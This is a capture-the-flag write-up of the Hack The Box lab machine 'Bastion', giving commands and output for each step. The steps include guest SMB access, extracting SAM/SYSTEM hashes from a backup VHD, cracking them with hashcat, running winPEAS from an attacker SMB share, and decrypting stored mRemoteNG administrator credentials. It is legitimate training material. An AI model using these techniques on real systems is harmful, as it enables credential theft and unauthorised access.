August
10th,
2020
This is an easy windows box
Tools used
- cat
- cd
- cp
- guestmount
- hashcat
- ls
- mkdir
- mount
- nmap
- pwd
- python
- samdump2
- smbmap
- smbserver
- ssh
- type
- wget
- winpeas
Reconnaissance
Nmap
nmap -sC -sV -oA bastion 10.10.10.134 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -32m55s, deviation: 1h09m15s, median: 7m03s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-05T09:54:49+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-05T07:54:51
|_ start_date: 2020-08-05T07:53:29
Here’s what nmap teaches us :
- port 22 (SSH) - OpenSSH for_Windows_7.9
- port 135 (MSRPC)
- port 139 (NETBIOS)
- port 445 (SMB) - Guest
Guest user is accepted with SMB, let’s see what I have access to :
smbmap -H 10.10.10.134 -u 'guest' -p ''
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
[\] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\TVUNIXQAMD, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
I have access to two shares :
- Backups
- IPC$
Let’s see what’s in those two shares :
smbmap -H 10.10.10.134 -u 'guest' -p '' -R
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\TYCGPNWRDX, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
.\Backups\*
dr--r--r-- 0 Wed Aug 5 09:58:37 2020 .
dr--r--r-- 0 Wed Aug 5 09:58:37 2020 ..
dr--r--r-- 0 Wed Aug 5 09:57:44 2020 imBkxlEdts
fw--w--w-- 116 Tue Apr 16 13:43:19 2019 note.txt
fr--r--r-- 0 Fri Feb 22 13:43:28 2019 SDT65CB.tmp
dr--r--r-- 0 Wed Aug 5 09:58:13 2020 TVUNIXQAMD
dr--r--r-- 0 Wed Aug 5 09:58:37 2020 TYCGPNWRDX
dr--r--r-- 0 Fri Feb 22 13:44:02 2019 WindowsImageBackup
.\Backups\WindowsImageBackup\*
dr--r--r-- 0 Fri Feb 22 13:44:02 2019 .
dr--r--r-- 0 Fri Feb 22 13:44:02 2019 ..
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 L4mpje-PC
.\Backups\WindowsImageBackup\L4mpje-PC\*
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 ..
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 Backup 2019-02-22 124351
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 Catalog
fr--r--r-- 16 Fri Feb 22 13:44:02 2019 MediaId
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 SPPMetadataCache
.\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 ..
fr--r--r-- 37761024 Fri Feb 22 13:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 5418299392 Fri Feb 22 13:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 1186 Fri Feb 22 13:45:32 2019 BackupSpecs.xml
fr--r--r-- 1078 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
fr--r--r-- 8930 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
fr--r--r-- 6542 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
fr--r--r-- 2894 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
fr--r--r-- 1488 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
fr--r--r-- 1484 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
fr--r--r-- 3844 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
fr--r--r-- 3988 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
fr--r--r-- 7110 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
fr--r--r-- 2374620 Fri Feb 22 13:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
.\Backups\WindowsImageBackup\L4mpje-PC\Catalog\*
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 ..
fr--r--r-- 5698 Fri Feb 22 13:45:32 2019 BackupGlobalCatalog
fr--r--r-- 7440 Fri Feb 22 13:45:32 2019 GlobalCatalog
.\Backups\WindowsImageBackup\L4mpje-PC\SPPMetadataCache\*
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 ..
fr--r--r-- 57848 Fri Feb 22 13:45:32 2019 {cd113385-65ff-4ea2-8ced-5630f6feca8f}
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 00:09:21 1601 lsass
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 scerpc
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-2d8-0
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 epmapper
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-1c4-0
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 eventlog
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-368-0
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 atsvc
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-35c-0
fr--r--r-- 4 Mon Jan 1 00:09:21 1601 wkssvc
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 spoolss
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 winreg
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 trkwks
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-5dc-0
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 openssh-ssh-agent
fr--r--r-- 3 Mon Jan 1 00:09:21 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 vgauth-service
fr--r--r-- 4 Mon Jan 1 00:09:21 1601 srvsvc
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-580-0
fr--r--r-- 1 Mon Jan 1 00:09:21 1601 Winsock2\CatalogChangeListener-24c-0
The backups share seems more interesting let’s mount it, first create a directory where the share will be mount :
mkdir /tmp/backup
Mount the share in this directory :
sudo mount -o 'username=guest,password=' -t cifs //10.10.10.134/Backups /tmp/backup/
It’s now mounted :
ls -al *
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
imBkxlEdts:
total 4
drwxr-xr-x 2 root root 0 Aug 5 2020 .
drwxr-xr-x 2 root root 4096 Aug 5 2020 ..
TVUNIXQAMD:
total 4
drwxr-xr-x 2 root root 0 Aug 5 2020 .
drwxr-xr-x 2 root root 4096 Aug 5 2020 ..
TYCGPNWRDX:
total 4
drwxr-xr-x 2 root root 0 Aug 5 2020 .
drwxr-xr-x 2 root root 4096 Aug 5 2020 ..
WindowsImageBackup:
total 4
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Aug 5 2020 ..
drwxr-xr-x 2 root root 0 Feb 22 2019 L4mpje-PC
There’s a file called note.txt :
cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Looking around to see what files is here :
pwd
/tmp/backup/WindowsImageBackup/L4mpje-PC
ls -al *
-rwxr-xr-x 1 root root 16 Feb 22 2019 MediaId
'Backup 2019-02-22 124351':
total 5330564
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Feb 22 2019 ..
-rwxr-xr-x 1 root root 37761024 Feb 22 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 1186 Feb 22 2019 BackupSpecs.xml
-rwxr-xr-x 1 root root 1078 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root 8930 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root 6542 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root 2894 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root 1488 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root 1484 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root 3844 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root 3988 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root 7110 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root 2374620 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
Catalog:
total 20
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Feb 22 2019 ..
-rwxr-xr-x 1 root root 5698 Feb 22 2019 BackupGlobalCatalog
-rwxr-xr-x 1 root root 7440 Feb 22 2019 GlobalCatalog
SPPMetadataCache:
total 64
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Feb 22 2019 ..
-rwxr-xr-x 1 root root 57848 Feb 22 2019 {cd113385-65ff-4ea2-8ced-5630f6feca8f}
There is a .vhd of 5Go, I might be able to use it, so I copy it to my box (I’m alone on the box so I don’t care about the sysadmin note.txt) :
cp 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd /home/liodeus/Downloads/hackthebox/bastion
Then I searched how to read/mount vhd files : https://xo.tc/how-to-mount-a-vhd-file-on-linux.html
sudo mkdir /mnt/test
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro /mnt/test -m /dev/sda1
Exploit
Looking around the mount, I don’t see anything interesting, so I copy to my box the SAM and SYSTEM files. I might be able to get a password from those two files :
cd /mnt/test
cp Windows/System32/config/SAM /home/liodeus/Downloads/hackthebox/bastion
cp Windows/System32/config/SYSTEM /home/liodeus/Downloads/hackthebox/bastion
I used samdum2 tool to gest the hash file :
samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Then crack it with hascat :
hashcat.exe -m 1000 -a 0 hash.txt rockyou.txt
[...]
26112010952d963c8dc4217daec986d9:bureaulampje
[...]
I now have credentials :
login : L4mpje
password : bureaulampje
I remember that the SSH port was open, so I tried them there :
ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
And I’m in has the user l4mpje ! It’ time for some enumeration, launch smbserver for easy file transfert :
sudo smbserver.py -smb2support liodeus ./
I then launch winPEAS :
\\10.10.14.10\liodeus\winPEASx64.exe
[+] Installed Applications --Via Program Files/Uninstall registry--(T1083&T1012&T1010&T1518) T1012&T1010&T1518)
[?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-dows/windows-local-privilege
-escalation#software
C:\Program Files (x86)\mRemoteNG
[...]
That is the parts that I found interesting, mRemoteNG is not a program installed by default on a windows box. Looking around install software I found it :
PS C:\Users\L4mpje\AppData\Roaming> ls
Directory: C:\Users\L4mpje\AppData\Roaming
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 22-2-2019 13:50 Adobe
d---s- 22-2-2019 13:52 Microsoft
d----- 22-2-2019 14:03 mRemoteNG
Looking the term “mRemoteNG exploit” on Google, I found multiples :
password storage insecure
gather mremoteng saved password
Looking on Google for exploit, I found this post telling where to found the file where the passwords are stored :
C:\Users\<Your_Windows_Account>\AppData\Roaming\mRemoteNG) right-click on confCons.xml
So I search it on the box :
PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> type .\confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GC
M" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0
oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeo
ut="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" Disp
layThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" R
edirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" Redire
ctKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEn
coding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPa
ssword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostna
me="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="
false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnab
leFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" I
nheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false"
InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" Inhe
ritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleS
ession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="fa
lse" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoad
BalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" Inheri
tExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false"
InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNC
Colors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHo
stname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false
" InheritRDGatewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128"
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostnam
e="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rendering
Engine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="f
alse" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayTh
emes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" Redire
ctPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKey
s="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncodin
g="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPasswor
d="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname=""
RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false
" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFon
tSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" Inheri
tPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" Inhe
ritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRe
directSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSessio
n="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false"
InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalan
ceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtA
pp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" Inher
itVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColor
s="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostnam
e="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" Inh
eritRDGatewayDomain="false" />
</mrng:Connections>
I can see the encypted password for the administrator :
aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
I then found this script to decrypt it :
wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Run it on to the found encrypted pssword :
python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
Nice, it works I now have credentials for the administrator :
login :administrator
password : thXLHM96BeKL0ER2
Let’s try them on the SSH port :
ssh administrator@10.10.10.134
administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
It’s a win ! I can now read the flag !
Flags
User.txt
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd
Root.txt
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b91811676ed6620a9c430e65c8
- OSCP (30) ,
- Writeup (26) ,
- Windows (13) ,
- Outdated Software (6) ,
- File Misconfiguration (6) ,
- SMB (5)